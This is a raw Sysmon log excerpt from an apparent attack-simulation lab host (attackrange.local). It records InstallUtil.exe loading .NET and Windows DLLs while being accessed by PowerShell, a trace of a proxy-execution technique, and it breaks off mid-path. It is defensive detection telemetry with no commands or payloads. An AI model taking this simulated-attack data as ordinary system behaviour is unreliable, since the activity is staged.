CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057458343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057458342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057458341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057458340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057458339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 13241300x800000000000000057458338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:53.427{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7d0-0xc7b2e58b) 734700x800000000000000057458336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057458335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057458334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057458333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057458332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057458331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057458330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057458329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057458328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.427{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057458327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057458326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057458325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057458324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057458323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057458322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057458321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057458320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057458319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057458318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057458317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057458316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057458315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057458314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BC-618E-33F7-04000000F101}31729628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f382512a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3824f91|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f38ae0c2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f381d217|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f42eda99|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f37e27bf|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3846231|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f38280d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3818df1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3855494 734700x800000000000000057458313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057458312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BC-618E-33F7-04000000F101}31729628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f382512a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3824f91|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f38ae0c2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f381d217|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f42eda99|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f37e27bf|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3846231|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f38280d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3818df1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3855494|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f385511c 10341000x800000000000000057458311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057458310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:53.412{8B6011A9-78BC-618E-33F7-04000000F101}31729628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78BD-618E-38F7-04000000F101}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f382512a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3824f91|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f38ae0c2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f381d217|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f42eda99|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f37e27bf|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3846231|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+f3828240|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.A